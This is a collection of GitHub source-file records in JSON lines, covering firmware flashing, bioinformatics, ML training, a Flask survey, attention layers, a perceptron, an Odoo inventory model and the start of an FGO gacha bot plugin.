+{"seq_id":"41312956637","text":"#!/usr/bin/env python3\n\nfrom zipfile import ZipFile\nimport sys\nimport time\nimport traceback\n\ntry:\n from .tinkerforge.ip_connection import IPConnection\n from .tinkerforge.bricklet_unknown import BrickletUnknown\n from .tinkerforge.brick_master import BrickMaster\nexcept ImportError:\n from tinkerforge.ip_connection import IPConnection\n from tinkerforge.bricklet_unknown import BrickletUnknown\n from tinkerforge.brick_master import BrickMaster\n\nfound_uid = None\ndef cb_enumerate(uid, connected_uid, position, hardware_version, firmware_version, device_identifier, enumeration_type):\n # search for bricklets only\n if not str(device_identifier).startswith('2'):\n return\n\n global found_uid\n found_uid = uid\n\ndef get_first_bricklet_uid(ipcon):\n ipcon.register_callback(IPConnection.CALLBACK_ENUMERATE, cb_enumerate)\n ipcon.enumerate()\n for i in range(1000):\n if found_uid != None:\n return found_uid\n time.sleep(0.01)\n\ndef xmc_flash_firmware(zbin, uid_bricklet=None):\n start = time.time()\n try:\n print('Starting bootloader mode')\n\n\n try:\n zf = ZipFile(zbin, 'r')\n except:\n print('Konnte Bricklet Plugin nicht öffnen:\\n\\n' + traceback.format_exc())\n return False, None\n\n plugin_data = None\n for name in zf.namelist():\n if name.endswith('firmware.bin'):\n plugin_data = zf.read(name)\n break\n\n if plugin_data == None:\n print('Konnte Firmware in zbin nicht finden')\n return False, None\n\n # Now convert plugin to list of bytes\n plugin = plugin_data\n regular_plugin_upto = -1\n for i in reversed(range(4, len(plugin)-12)):\n if plugin[i] == 0x12 and plugin[i-1] == 0x34 and plugin[i-2] == 0x56 and plugin[i-3] == 0x78:\n regular_plugin_upto = i\n break\n\n if regular_plugin_upto == -1:\n print('Konnte \"magic number\" in Firmware nicht finden')\n\n ipcon = IPConnection()\n ipcon.connect('localhost', 4223)\n if uid_bricklet == None:\n uid_bricklet = get_first_bricklet_uid(ipcon)\n if uid_bricklet == None:\n print('Could not find any Bricklet')\n return\n\n print('Using UID: ' + uid_bricklet)\n\n device = BrickletUnknown(uid_bricklet, ipcon)\n\n device.set_bootloader_mode(device.BOOTLOADER_MODE_BOOTLOADER)\n counter = 0\n last_exc_tup = None\n while True:\n try:\n if device.get_bootloader_mode() == device.BOOTLOADER_MODE_BOOTLOADER:\n break\n except:\n last_exc_tup = sys.exc_info()\n\n if counter == 10:\n print('Gerät nicht im Bootloader-Modus nach 2,5s.')\n traceback.print_exception(*last_exc_tup)\n return False, None\n\n time.sleep(0.25)\n counter += 1\n\n num_packets = len(plugin)//64\n index_list = range(num_packets)\n\n for _ in range(2):\n if _ == 1:\n index_list = range(num_packets)\n\n print('Schreibe Firmware: ' + name)\n to_write = str(len(index_list) - 1)\n for position in index_list:\n start = position*64\n end = (position+1)*64\n print('Schreibe Firmware: ' + str(position) + '/' + to_write)\n device.set_write_firmware_pointer(start)\n device.write_firmware(plugin[start:end])\n\n print('Wechsle vom Bootloader-Modus in den Firmware-Modus')\n\n mode_ret = device.set_bootloader_mode(device.BOOTLOADER_MODE_FIRMWARE)\n if mode_ret != 0 and mode_ret != 2: # 0 = ok, 2 = no change\n error_str = ''\n if mode_ret == 1:\n error_str = 'Invalid mode (Error 1)'\n elif mode_ret == 3:\n error_str = 'Entry function not present (Error 3)'\n elif mode_ret == 4:\n error_str = 'Device identifier incorrect (Error 4)'\n elif mode_ret == 5:\n error_str = 'CRC Mismatch (Error 5)'\n else: # unkown error case\n error_str = 'Error ' + str(mode_ret)\n\n # In case of CRC Mismatch we try a second time\n if mode_ret == 5:\n continue\n\n print('Konnte nicht vom Bootloader-Modus in den Firmware-Modus wechseln: ' + error_str)\n return False, None\n\n # Everything OK, we dont have to try a second time\n break\n\n counter = 0\n last_exc_tup = None\n while True:\n try:\n bootloader_mode = device.get_bootloader_mode()\n if bootloader_mode == device.BOOTLOADER_MODE_FIRMWARE:\n break\n except:\n last_exc_tup = sys.exc_info()\n\n if counter == 10:\n print('Gerät nicht im Firmware-Modus nach 25s.')\n traceback.print_exception(*last_exc_tup)\n return False, None\n\n time.sleep(0.25)\n counter += 1\n\n print('Firmware geschrieben und gestartet')\n except:\n traceback.print_exception()\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n print('Please give .zbin as parameter')\n else:\n xmc_flash_firmware(sys.argv[1])\n","repo_name":"Tinkerforge/flash-test","sub_path":"src/flash-test/plugin_system/xmc_flash_firmware.py","file_name":"xmc_flash_firmware.py","file_ext":"py","file_size_in_byte":5482,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"71877742566","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# String Algorithms\n\n\ndef fun(file_name):\n string = open(file_name, \"rt\").read().replace(\"\\n\", \"\")\n string = list(string)\n #print(string)\n counts = dict()\n f = open(\"result_dna.txt\", \"w+\")\n for words in string:\n counts[words] = counts.get(words, 0) + 1\n \n result = str(counts[\"A\"])+\" \"+str(counts[\"C\"])+\" \"+str(counts[\"G\"])+\" \"+str(counts[\"T\"])\n f.write(result)\n\n f.close()\n\n\nif __name__ == '__main__':\n fun(\"rosalind_dna.txt\")\n","repo_name":"yxj17173/Rosalind","sub_path":"1 Bioinformatics Stronghold/01 Counting DNA Nucleotides.py","file_name":"01 Counting DNA Nucleotides.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"42464236382","text":"from sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nimport lightgbm as lgb\nfrom sklearn.metrics import accuracy_score, f1_score, precision_score, recall_score\nimport numpy as np\nimport mlflow\n\ndef run_logistic_regression(X, y, X_test, y_test, params={}):\n \"\"\"\n fit logistic regression model and return different metrics\n params:\n X - pd.DataFrame/np.array - featuers for the model\n y - pd.Series/np.array - target variable\n X_test - pd.DataFrame/np.array - test featuers\n y - pd.Series/np.array - test target\n params - dict - model params\n \"\"\"\n lr = LogisticRegression(random_state=1, max_iter=1000, solver='saga', **params)\n lr.fit(X, y)\n pred = lr.predict(X_test)\n return lr, accuracy_score(y_test, pred), f1_score(y_test, pred, average='macro'), precision_score(y_test, pred, average='macro'), recall_score(y_test, pred, average='macro')\n\ndef run_random_forest(X, y, X_test, y_test, params={}):\n \"\"\"\n fit random forest model and return different metrics\n params:\n X - pd.DataFrame/np.array - featuers for the model\n y - pd.Series/np.array - target variable\n X_test - pd.DataFrame/np.array - test featuers\n y - pd.Series/np.array - test target\n params - dict - model params\n \"\"\"\n rf = RandomForestClassifier(random_state=1, n_jobs=4, **params)\n rf.fit(X, y)\n pred = rf.predict(X_test)\n return rf, accuracy_score(y_test, pred), f1_score(y_test, pred, average='macro'), precision_score(y_test, pred, average='macro'), recall_score(y_test, pred, average='macro')\n\ndef run_lightgbm(X, y, X_val, y_val, X_test, y_test, params={}):\n \"\"\"\n fit lightgbm model and return different metrics\n params:\n X - pd.DataFrame/np.array - featuers for the model\n y - pd.Series/np.array - target variable\n X_test - pd.DataFrame/np.array - validation featuers\n y - pd.Series/np.array - validation target\n X_test - pd.DataFrame/np.array - test featuers\n y - pd.Series/np.array - test target\n params - dict - model params\n \"\"\" \n p = {**{'force_row_wise':True, 'num_threads':4, 'objective': 'multiclass', 'num_class':3, 'metric': 'multi_logloss', 'random_state':1}, **params}\n clf = lgb.LGBMClassifier(verbose=-1, **p)\n callbacks = [lgb.early_stopping(100, verbose=0), lgb.log_evaluation(period=0)]\n clf.fit(X, y, eval_set=[(X, y),(X_val, y_val)], eval_names=['train','val'], callbacks=callbacks)\n pred = clf.predict(X_test)\n\n return clf, accuracy_score(y_test, pred), f1_score(y_test, pred, average='macro'), precision_score(y_test, pred, average='macro'), recall_score(y_test, pred, average='macro')\n\ndef run_ml_flow_experiment(X_train, X_val, X_test, y_train, y_val, y_test, params, experiment_name='', run_section='all', model_desc=''):\n \"\"\"\n fit models and track performance in mlflow\n params:\n X - pd.DataFrame/np.array - featuers for the model\n y - pd.Series/np.array - target variable\n X_test - pd.DataFrame/np.array - validation featuers\n y - pd.Series/np.array - validation target\n X_test - pd.DataFrame/np.array - test featuers\n y - pd.Series/np.array - test target\n params - dict - model params\n experiment_name - str - name of the mlflow experiment \n run_section - str - 'all' or selection between ['lr', 'rf', 'catb']\n model_desc - str - optional description to add when logging\n \"\"\"\n mlflow.set_experiment(experiment_name=experiment_name)\n\n if run_section=='all' or 'lr' in run_section:\n for i,p in enumerate(params['lr']):\n with mlflow.start_run() as run:\n lr, acc, f1, prec, rec = run_logistic_regression(X=np.concatenate((X_train, X_val), axis=0), \n y=np.concatenate((y_train, y_val), axis=0), \n X_test=X_test, y_test=y_test, params=p)\n print('model: logistic regression, accuracy: ',acc, 'f1: ', f1, '\\n params: ', p)\n mlflow.log_params(p)\n mlflow.log_param(\"model\", 'logistic regression'.format(model_desc))\n mlflow.log_metric(\"accuracy\", acc)\n mlflow.log_metric(\"precision\", prec)\n mlflow.log_metric(\"recall\", rec)\n mlflow.log_metric(\"f1\", f1)\n mlflow.set_tag('mlflow.runName', 'lr_{}_{}'.format(model_desc, i))\n\n if run_section=='all' or 'rf' in run_section:\n for i,p in enumerate(params['rf']):\n with mlflow.start_run() as run:\n rf, acc, f1, prec, rec = run_random_forest(X=np.concatenate((X_train, X_val), axis=0), \n y=np.concatenate((y_train, y_val), axis=0), \n X_test=X_test, y_test=y_test, params=p)\n print('model: random forest ','accuracy: ',acc, 'f1: ', f1, '\\n params: ', p)\n mlflow.log_params(p)\n mlflow.log_param(\"model\", 'random forest'.format(model_desc))\n mlflow.log_metric(\"accuracy\", acc)\n mlflow.log_metric(\"precision\", prec)\n mlflow.log_metric(\"recall\", rec)\n mlflow.log_metric(\"f1\", f1)\n mlflow.set_tag('mlflow.runName', 'rf_{}_{}'.format(model_desc, i))\n\n if run_section=='all' or 'lgb' in run_section: \n for i,p in enumerate(params['lgb']):\n with mlflow.start_run() as run:\n lgb, acc, f1, prec, rec = run_lightgbm(X=X_train, y=y_train, X_val=X_val, y_val=y_val, X_test=X_test, y_test=y_test, params=p)\n print('model: lightgbm, accuracy: ',acc, 'f1: ', f1, '\\n params: ', p)\n mlflow.log_params(p)\n mlflow.log_param(\"model\", 'lightgbm'.format(model_desc))\n mlflow.log_metric(\"accuracy\", acc)\n mlflow.log_metric(\"precision\", prec)\n mlflow.log_metric(\"recall\", rec)\n mlflow.log_metric(\"f1\", f1)\n mlflow.set_tag('mlflow.runName', 'lgb_{}_{}'.format(model_desc, i))","repo_name":"apantovic/chess_prediction","sub_path":"src/models/train_models.py","file_name":"train_models.py","file_ext":"py","file_size_in_byte":6086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8186776792","text":"from flask import Flask, redirect, request, render_template, session, flash\nfrom flask_debugtoolbar import DebugToolbarExtension\nfrom surveys import satisfaction_survey as survey\n\nRESPONSES_KEY = \"responses\"\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = \"birbsarecool\"\napp.config['DEBUG_TB_INTERCEPT_REDIRECTS'] = False\n\ndebug = DebugToolbarExtension(app)\n\n\n@app.route('/')\ndef home():\n return render_template('home.html', survey=survey)\n\n@app.route('/start')\ndef start_survey():\n session[RESPONSES_KEY] = []\n return redirect('questions/0')\n\n@app.route('/questions/')\ndef question(id):\n responses = session.get(RESPONSES_KEY)\n\n if(len(responses) == len(survey.questions)):\n return render_template('done.html')\n\n if(len(responses) != id):\n flash(\"You must answer the questions in order\")\n return redirect(f\"/questions/{len(responses)}\")\n \n question = survey.questions[id]\n \n return render_template('question.html', num_q=id+1, question=question)\n\n\n@app.route('/answer', methods=[\"POST\"])\ndef store_answers():\n selection = request.form['answer']\n responses = session[RESPONSES_KEY]\n responses.append(selection)\n session[RESPONSES_KEY] = responses\n\n if (len(responses) == len(survey.questions)):\n return render_template('done.html')\n \n else:\n return redirect(f\"/questions/{len(responses)}\")\n","repo_name":"ambernluu/Flask-Survey","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"69947420326","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport math\n\nclass Attention(nn.Module):\n def __init__(self, dropout=0):\n super(Attention, self).__init__()\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, Q, K, V, mask=None):\n K_T = torch.transpose(K, -2, -1)\n QK = torch.matmul(Q, K_T)\n d_k = K.size(-1)\n # attention score\n attention_score = QK/math.sqrt(d_k)\n\n # masking된 부분을 '0'으로 만듦\n # masked_fill: mask가 0인 부분을 -1e20로 채움('-큰수'가 softmax함수를 통과하면 '0'에 가깝게 됨)\n if mask is not None:\n attention_score = attention_score.masked_fill(mask == 0, -1e20)\n\n attention = F.softmax(attention_score, dim=-1)\n # dropout\n attention = self.dropout(attention)\n\n # 최종 attention값\n attention = torch.matmul(attention, V)\n\n return attention\n\nclass MultiHeadAttention(nn.Module):\n def __init__(self, head_num, d_model, dropout=0.1):\n super(MultiHeadAttention, self).__init__()\n assert d_model % head_num == 0\n\n self.head_num = head_num\n self.d_model = d_model\n self.d_k = self.d_v = d_model // head_num\n\n self.Q_weigh = nn.Linear(d_model, d_model)\n self.K_weigh = nn.Linear(d_model, d_model)\n self.V_weigh = nn.Linear(d_model, d_model)\n self.O_weigh = nn.Linear(d_model, d_model)\n\n self.attention = Attention()\n self.dropout = nn.Dropout(p=dropout)\n\n def forward(self, Q, K, V, mask=None):\n # if mask is not None:\n # # Same mask applied to all h heads.\n # mask = mask.unsqueeze(1)\n\n batche_num = Q.size(0)\n\n # view: tensor의 내용은 건들지않고 모양만 변형\n Q = self.Q_weigh(Q).view(batche_num, -1, self.head_num, self.d_k).transpose(1, 2)\n K = self.K_weigh(K).view(batche_num, -1, self.head_num, self.d_k).transpose(1, 2)\n V = self.V_weigh(V).view(batche_num, -1, self.head_num, self.d_k).transpose(1, 2)\n\n attention = self.attention(Q, K, V, mask)\n # contiguous(): tensor를 transpose, view하는 등 모향변환 과정을 거치면 메모리할당 순서가 바뀜. 이 순서를 다시 정렬해줌.\n attention = attention.transpose(1, 2).contiguous().view(batche_num, -1, self.head_num*self.d_k)\n attention = self.O_weigh(attention)\n\n return attention\n","repo_name":"CountingMstar/TextSummarization","sub_path":"my_bert/transformer/attention.py","file_name":"attention.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34204386849","text":"from functools import reduce\r\n\r\ndef add(x,y):\r\n return x+y\r\n\r\n\r\nclass Perceptron(object):\r\n def __init__(self,input_num,activator):\r\n self.activator = activator\r\n self.weights = [0.0 for _ in range(input_num)]\r\n self.bias = 0.0\r\n\r\n def __str__(self):\r\n return 'weights\\t:%s\\nbias\\t:%f\\n' % (self.weights, self.bias)\r\n\r\n def predict(self,input_vec):\r\n pack = zip(input_vec,self.weights)\r\n multi = []\r\n for (x,w) in pack:\r\n multi.append(x*w)\r\n activtion = reduce(add, multi)\r\n\r\n return self.activator(activtion + self.bias)\r\n\r\n def train(self,input_vecs,labels,iteration,rate):\r\n for i in range(iteration):\r\n self._one_iteration(input_vecs,labels,rate)\r\n\r\n def _one_iteration(self,input_vecs,labels,rate):\r\n samples = zip(input_vecs,labels)\r\n for (input_vecs,labels) in samples:\r\n output = self.predict(input_vecs)\r\n self._update_weights(input_vecs,output,labels,rate)\r\n\r\n\r\n def _update_weights(self,input_vecs,output,labels,rate):\r\n delta = labels -output\r\n pack = zip(input_vecs,self.weights)\r\n tmp = []\r\n for (x,w) in pack:\r\n tmp.append(w+x*delta*rate)\r\n self.weights = tmp\r\n self.bias = self.bias + delta*rate\r\n\r\ndef f(x):\r\n if x>0:\r\n return 1\r\n else:\r\n return 0\r\n\r\ndef get_train_dataset():\r\n input_vecs = [[1,1],[0,0],[1,0],[0,1]]\r\n labels = [1,0,0,0]\r\n return input_vecs,labels\r\n\r\ndef train_and_perception():\r\n p = Perceptron(2,f)\r\n input_vecs,labels =get_train_dataset()\r\n p.train(input_vecs,labels,10,0.1)\r\n return p\r\n\r\nif __name__=='__main__':\r\n and_perception = train_and_perception()\r\n print(and_perception)\r\n print('1 and 1 = %d' % and_perception.predict([1, 1]))\r\n print('0 and 0 = %d' % and_perception.predict([0, 0]))\r\n print('1 and 0 = %d' % and_perception.predict([1, 0]))\r\n print('0 and 1 = %d' % and_perception.predict([0, 1]))","repo_name":"yunhao138/deepLearning","sub_path":"src/deeplearning/py3.x/perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"71016100325","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\n\n\nclass ProductTemplate(models.Model):\n _inherit = 'product.template'\n\n more_info_url = fields.Char('More Info URL', compute='_get_more_info_url')\n dropship_shipping_cost = fields.Float('Dropship Shipping Cost', compute='_compute_qty_autoplus')\n dropship_handling_cost = fields.Float('Dropship Handling Cost', compute='_compute_qty_autoplus')\n dropship_base_cost = fields.Float('Dropship Base Cost', compute='_compute_qty_autoplus')\n dropship_total_cost = fields.Float('Dropship Total Cost', compute='_compute_qty_autoplus')\n\n @api.multi\n @api.depends()\n def _get_more_info_url(self):\n for p in self:\n p.more_info_url = '/autoplus/products/' + str(p.id)\n\n @api.multi\n def _compute_qty_autoplus(self):\n for product_tmpl_id in self:\n qty_onhand = 0.0\n dropship_base_cost = 0.0\n dropship_handling_cost = 0.0\n dropship_shipping_cost = 0.0\n dropship_total_cost = 0.0\n\n query = \"\"\"\n SELECT INV.QtyOnHand as qty_onhand, PR.Cost as dropship_total_cost FROM Inventory INV\n LEFT JOIN InventoryMiscPrCur PR on INV.InventoryID = PR.InventoryID\n WHERE INV.PartNo = '%s'\n \"\"\" %product_tmpl_id.part_number\n if product_tmpl_id.mfg_code in ['BXLD', 'GMK']:\n query = \"\"\"\n SELECT INV.QtyOnHand as qty_onhand, C2C.DomesticCost as dropship_base_cost, C2C.ShippingCost as dropship_shipping_cost, PR.Cost as dropship_total_cost FROM Inventory INV\n LEFT JOIN InventoryMiscPrCur PR on INV.InventoryID = PR.InventoryID\n LEFT JOIN C2C.dbo.Warehouse C2C on C2C.PartNumber = INV.PartNo\n WHERE INV.PartNo = '%s'\n \"\"\" %product_tmpl_id.part_number\n elif product_tmpl_id.mfg_code in ['BFHZ', 'REPL', 'STYL', 'NDRE', 'BOLT', 'EVFI']:\n query = \"\"\"\n SELECT INV.QtyOnHand as qty_onhand, USAP.Cost as dropship_base_cost, USAP.ShippingPrice as dropship_shipping_cost, USAP.HandlingPrice as dropship_handling_cost, PR.Cost as dropship_total_cost FROM Inventory INV\n LEFT JOIN InventoryMiscPrCur PR on INV.InventoryID = PR.InventoryID\n LEFT JOIN USAP.dbo.Warehouse USAP on USAP.PartNo = INV.PartNo\n WHERE INV.PartNo = '%s'\n \"\"\" %product_tmpl_id.part_number\n elif product_tmpl_id.mfg_code in ['PPR']:\n query = \"\"\"\n SELECT INV.QtyOnHand as qty_onhand, USAP.Cost as dropship_base_cost, USAP.ShippingPrice as dropship_shipping_cost, USAP.HandlingPrice as dropship_handling_cost, PR.Cost as dropship_total_cost FROM Inventory INV\n LEFT JOIN InventoryMiscPrCur PR on INV.InventoryID = PR.InventoryID\n LEFT JOIN USAP.dbo.Warehouse USAP on USAP.PartNo = INV.PartNo\n WHERE INV.PartNo = '%s'\n \"\"\" %product_tmpl_id.part_number\n if query:\n result = self.env['sale.order'].autoplus_execute(query)\n if result:\n qty_onhand = float(result[-1]['qty_onhand']) if result[-1]['qty_onhand'] > 0 else 0.0\n dropship_base_cost = float(result[-1]['dropship_base_cost']) if 'dropship_base_cost' in result[-1] and result[-1]['dropship_base_cost'] > 0 else 0.0\n dropship_shipping_cost = float(result[-1]['dropship_shipping_cost']) if 'dropship_shipping_cost' in result[-1] and result[-1]['dropship_shipping_cost'] > 0 else 0.0\n dropship_handling_cost = float(result[-1]['dropship_handling_cost']) if 'dropship_handling_cost' in result[-1] and result[-1]['dropship_handling_cost'] > 0 else 0.0\n dropship_total_cost = float(result[-1]['dropship_total_cost']) if 'dropship_total_cost' in result[-1] and result[-1]['dropship_total_cost'] > 0 else 0.0\n product_tmpl_id.qty_onhand = qty_onhand\n product_tmpl_id.dropship_base_cost = dropship_base_cost\n product_tmpl_id.dropship_handling_cost = dropship_handling_cost\n product_tmpl_id.dropship_shipping_cost = dropship_shipping_cost\n product_tmpl_id.dropship_total_cost = dropship_total_cost\n\n @api.multi\n def _compute_purchase_info(self):\n return\n","repo_name":"ilyasProgrammer/Odoo-eBay-Amazon","sub_path":"product_info/models/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":4418,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"52"} +{"seq_id":"38802245140","text":"import yaml\nfrom typing import List, Dict\nfrom itertools import tee, filterfalse\n\ndef load_config(config_path: str):\n '''Opens the YAML config file at the given path. '''\n try:\n with open(config_path, 'r') as f:\n config = yaml.load(f, Loader=yaml.FullLoader)\n return config\n except FileNotFoundError:\n raise Exception(f'Config file not found at path {config_path}.')\n except Exception as e:\n raise e\n\ndef check_config(config: Dict, top_level_key: str, config_keys: List[str], obj=None):\n '''config should be a dictionary containing settings.\n top_level_key should be a top-level key in config, corresponding to a particular set of keys/values. \n config_keys should be a list of keys to check for in section.\n obj should be an optional reference to the Python object to which to add the config keys/values as attributes. Otherwise, they are returned as a dict.'''\n try:\n if top_level_key not in config:\n raise Exception(f'{config_path} should contain a dictionary of settings, stored under the {top_level_key} key.')\n config_keys = set(config_keys)\n # Test for the presence of the required API settings\n if not config_keys <= set(config[top_level_key].keys()):\n raise Exception(f'One or more settings missing from {config_path}')\n # For convenience, convert to class attributes\n if obj:\n for c in config_keys:\n setattr(obj, c, config[top_level_key][c])\n return obj\n else:\n return config[top_level_key]\n except Exception as e:\n raise Exception(\"Error loading configuration.\") from e\n\ndef partition(pred, iterable):\n '''Use a predicate to partition entries into false entries and true entries. From itertools recipes'''\n t1, t2 = tee(iterable)\n return filterfalse(pred, t1), filter(pred, t2)","repo_name":"gwu-libraries/libcal_pp_integration","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"20874342023","text":"import asyncio\nimport io\nimport json\nimport os\n\nfrom jsonpath import jsonpath # noqa\nfrom typing import Union, List\n\nfrom PIL import Image, ImageFont, ImageDraw\nfrom aiocqhttp import MessageSegment\nfrom playwright.async_api import async_playwright\n\nfrom hoshino import config, util, aiorequests, logger, Service, priv\nfrom hoshino.typing import CQEvent\n\nsv_help = '''\n# 抽卡模拟相关\n[fgo十连] fgo抽卡\n[fgo百连] 100抽\n[获取fgo卡池] 从mooncell获取卡池数据\n[查询fgo卡池] 查询本地缓存的卡池以及本群卡池\n[切换fgo卡池 + 卡池编号] 切换需要的卡池\n[切换fgo日替卡池 + 卡池编号 + 日替卡池编号] 切换需要的日替卡池\n'''.strip()\n\nsv = Service(\n name='fgo抽卡',\n help_=sv_help,\n bundle=\"娱乐\",\n enable_on_default=True,\n visible=True,\n use_priv=priv.NORMAL, # 使用权限\n manage_priv=priv.ADMIN, # 管理权限\n)\n\nsv_fetch_help = '''\n# 数据管理相关\n[获取全部内容] 获取从者/礼装/纹章的相关内容\n- 从者包括职介和指令卡\n- 礼装/纹章包括技能\n- 子命令:\n - [获取全部从者]\n - [获取全部礼装]\n - [获取全部纹章]\n[下载全部卡片资源] 从上述数据中下载对应静态资源\n- 子命令:\n - [下载全部从者资源]\n - [下载全部礼装资源]\n - [下载全部纹章资源]\n'''.strip()\n\nsv_fetch = Service(\n name='fgo数据获取',\n help_=sv_fetch_help,\n bundle=\"娱乐\",\n enable_on_default=True,\n visible=True,\n use_priv=priv.NORMAL, # 使用权限\n manage_priv=priv.ADMIN, # 管理权限\n)\n\nsv_lib_help = '''\n# fgo数据库相关\n``[更新fgo图书馆]`` 获取从者/礼装/纹章的相关详细数据,包括属性、白值等\n- 支持附带类型参数以更新指定内容\n- 类型参数:从者/礼装/纹章/最新\n - 当参数含有最新时,只会获取本地不存在的内容\n - 支持种类与最新同时存在\n- **※需要先执行``[获取全部内容]``**\n\n``[增添fgo图书馆 + 类型 + id]`` 在本地已存在图书馆的情况下,手动增添新数据,以避免每次数据更新都需要重新爬一次全部内容\n- 类型:从者、礼装、纹章\n\n``[查询最新图书馆 + 类型]`` 获取最近的内容\n\n``[修补fgo图书馆 + 类型 + id]`` 单独修补某张卡片的详细数据\n- 类型为:从者、礼装、纹章\n- **※需要先执行``[更新fgo图书馆]``**\n\n``[fgo从者查询 + 关键词(至少一个)]`` 通过关键词搜索从者\n- 若关键词大于两个,只会返回同时符合的\n- 可以附带参数``详细``以获取卡面及游戏数据,附带参数``数据``则不显示卡面只显示游戏数据\n- 当输入参数存在id{卡片id}时,直接返回对应id的卡片\n - 例子:``查询fgo从者 id312``\n\n``[fgo礼装查询 + 关键词(至少一个)]`` 通过关键词搜索礼装\n- 若关键词大于两个,只会搜索同时符合的\n- 可以附带参数``详细``以获取卡面及游戏数据\n- 查询特定id的礼装同上\n\n``[fgo纹章查询 + 关键词(至少一个)]`` 通过关键词搜索礼装\n- 若关键词大于两个,只会搜索同时符合的\n- 可以附带参数``详细``以获取卡面及游戏数据\n- 查询特定id的纹章同上\n'''.strip()\n\nsv_lib = Service(\n name='fgo图书馆',\n help_=sv_lib_help,\n bundle=\"娱乐\",\n enable_on_default=True,\n visible=True,\n use_priv=priv.NORMAL, # 使用权限\n manage_priv=priv.ADMIN, # 管理权限\n)\n\nsv_lucky_help = '''\n[更新fgo福袋] 获取福袋信息\n- 初次查询福袋之前务必先执行此命令\n[查询fgo福袋 + 概况] 查询全部福袋的文字概况\n[查询fgo福袋 + 国服/日服] 查询当前存在的福袋数据\n- [查询fgo福袋 + 国服/日服 + 福袋编号] 查询对应顺序的福袋详细数据\n- [查询fgo福袋 + 国服/日服 + 全部] 查询全部福袋详细数据\n[查询fgo福袋 + 未来] 查询国服千里眼福袋数据\n[抽fgo福袋 + 国服/日服 + 福袋编号 + 子池子编号(默认为1)] 抽福袋\n'''.strip()\n\nsv_lucky = Service(\n name='fgo福袋',\n help_=sv_lucky_help,\n bundle=\"娱乐\",\n enable_on_default=True,\n visible=True,\n use_priv=priv.NORMAL, # 使用权限\n manage_priv=priv.ADMIN, # 管理权限\n)\n\nsv_manage_help = '''\n# 抽卡管理命���:\n[fgo数据初始化] 初始化数据文件及目录,务必安装后先执行此命令!\n[fgo数据下载] 下载从者及礼装图标,务必先初始化数据再执行下载!\n[跟随最新/剧情卡池] 设置卡池数据更新后跟随最新国服卡池还是国服剧情卡池\n[fgo_enable_crt + crt文件路径] 为下载配置crt文件以规避拒绝访问,留空为默认,False为禁用\n[fgo_check_crt] 检查本群crt文件配置状态\n[重载配置文件] 为本群新建默认配置或还原至默认配置,同时修补其他群的配置\n[切换抽卡样式 + 样式] 切换抽卡样式,可选样式:\n- 文字:旧版简约图标\n- 图片:仿真实抽卡\n[设置fgo时间 + 小时 + 分钟 + 秒] 设置自动更新时间间隔,至少输入其中一个参数\n- 例如:``设置fgo时间 1小时60分钟60秒``\n'''.strip()\n\nsv_manage = Service(\n name='fgo管理',\n help_=sv_manage_help,\n bundle=\"娱乐\",\n enable_on_default=True,\n visible=True,\n use_priv=priv.NORMAL, # 使用权限\n manage_priv=priv.ADMIN, # 管理权限\n)\n\nsv_news_help = '''\n# 新闻相关:\n[获取fgo新闻 + 数量] 从官网获取公告新闻,默认6条,置顶的概率公告会去掉\n[查询fgo新闻 + 编号/all] 从本地查询公告具体内容,all代表全部获取\n- 可以在末尾附加参数``pic``不使用截图\n[清除新闻缓存] 移除新闻截图\n'''.strip()\n\nsv_news = Service(\n name='fgo新闻获取',\n help_=sv_news_help,\n bundle=\"娱乐\",\n enable_on_default=True,\n visible=True,\n use_priv=priv.NORMAL, # 使用权限\n manage_priv=priv.ADMIN, # 管理权限\n)\n\nheight = 194\nwidth = 178\ndis = 23\nfloor = 48\nst1w = 92\nst1h = 200\nst2 = 192\n\nbox_list = []\n\nbox1 = (st1w, st1h)\nfor box_i in range(6):\n box_list.append(box1)\n lst = list(box1)\n lst[0] += width + dis\n box1 = tuple(lst)\n\nbox2 = (st2, st1h + height + floor)\nfor box_i in range(5):\n box_list.append(box2)\n lst = list(box2)\n lst[0] += width + dis\n box2 = tuple(lst)\n\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.6) \",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n \"Accept-Language\": \"zh-cn\"\n}\n\nbanned_id = [\"333\", \"240\", \"168\", \"151\", \"152\", \"149\", \"83\"]\n\nbasic_path = os.path.join(config.RES_DIR, \"img\", \"fgo\")\nicon_path = os.path.join(basic_path, \"icons\")\nsvt_path = os.path.join(icon_path, \"svt_icons\")\ncft_path = os.path.join(icon_path, \"cft_icons\")\nskill_path = os.path.join(icon_path, \"skill_icons\")\ncmd_path = os.path.join(icon_path, \"cmd_icons\")\ncard_path = os.path.join(icon_path, \"card_icons\")\nclass_path = os.path.join(icon_path, \"class_icons\")\n\nres_paths = [basic_path, icon_path, svt_path, cft_path, skill_path, cmd_path, card_path, class_path]\n\nruntime_path = os.path.dirname(__file__)\n\ndata_path = os.path.join(runtime_path, 'data')\nnews_img_path = os.path.join(runtime_path, 